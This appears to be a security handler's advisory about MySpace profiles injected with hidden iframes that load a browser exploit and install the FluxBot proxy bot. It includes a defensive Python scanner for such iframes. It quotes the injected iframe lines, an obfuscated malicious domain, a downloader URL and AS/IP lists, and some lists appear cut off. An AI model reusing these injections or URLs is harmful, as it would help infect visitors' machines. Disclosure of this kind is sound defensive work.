CAREFUL! This diary contains links to malicious code!
A number of MySpace profiles include drive-by exploits. The exploits will install a version of "flux bot", a very popular proxy network bot.
FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.
Infected MySpace "Friend IDs": 39184135, 171598920, 22057010
A typical excerpt from an infected profile (obfuscated to protect the innocent):
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
<iframe src="http://fafb4c4c .com/header_03.gif" width=1
The domain used here is of course again served via flux. header_03.gif
<iframe src="http://fafb4c4c .com/routine.php" width=1
Are we there yet? Yup, just one more (patched) Internet Explorer exploit to go. The exploit will install the .exe. For example:
http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen among others these
Settings for the bot can be found here:
Once it's all said and done, you will be a proud new member of the flux net, and soon you will find your system participating in phishing and similar endeavours.
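As an added example (my own code, not from this diary or the handler team), a small Python scanner for the hidden-iframe injection shown in the profile excerpt above: it flags 1-pixel or display:none iframes and any iframe whose src points off the profile site. The sample HTML and the host example-flux-domain.invalid are constructed stand-ins for the obfuscated domain in the excerpt.

```python
import re
from urllib.parse import urlparse

# Match an <iframe ...> tag and capture its attribute list.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# Match name=value pairs, quoted or bare (the excerpt uses bare width=1).
ATTR_RE = re.compile(r'([a-z-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))', re.IGNORECASE)


def iframe_attrs(tag_body):
    """Parse the attribute list of one iframe tag into a lowercase dict."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(tag_body)}


def is_tiny(value):
    """A width/height of 0 or 1 (bare or px) marks a frame the user cannot see."""
    if value is None:
        return False
    m = re.match(r"^\s*(\d+)\s*(px)?\s*$", value)
    return m is not None and int(m.group(1)) <= 1


def find_hidden_iframes(html, trusted_hosts):
    """Return a list of (src, reasons) for iframes that look like drive-by loaders."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = iframe_attrs(m.group(1))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if is_tiny(attrs.get("width")) or is_tiny(attrs.get("height")):
            reasons.append("1px frame")
        if "display:none" in attrs.get("style", "").replace(" ", "").lower():
            reasons.append("display:none")
        # Anything not on the profile site (or a subdomain of it) is off-site content.
        if host and not any(host == t or host.endswith("." + t) for t in trusted_hosts):
            reasons.append("off-site src")
        if reasons:
            hits.append((src, reasons))
    return hits


# Constructed profile fragment modelled on the excerpt above (placeholder domain).
SAMPLE = """
<div class="profile"><a href="http://home.myspace.com/index.cfm?fuseaction=user">home</a>
<iframe src="http://example-flux-domain.invalid/header_03.gif" width=1 height=1></iframe>
<iframe src="http://example-flux-domain.invalid/routine.php" width="1" height="1"></iframe>
<iframe src="http://myspace.com/embedded_player" width="400" height="300"></iframe>
</div>"""

if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE, ["myspace.com"]):
        print(src, "->", ", ".join(reasons))
```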
AS13767 | 188.8.131.52
AS15083 | 184.108.40.206
AS25761 | 220.127.116.11
AS25761 | 18.104.22.168
As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.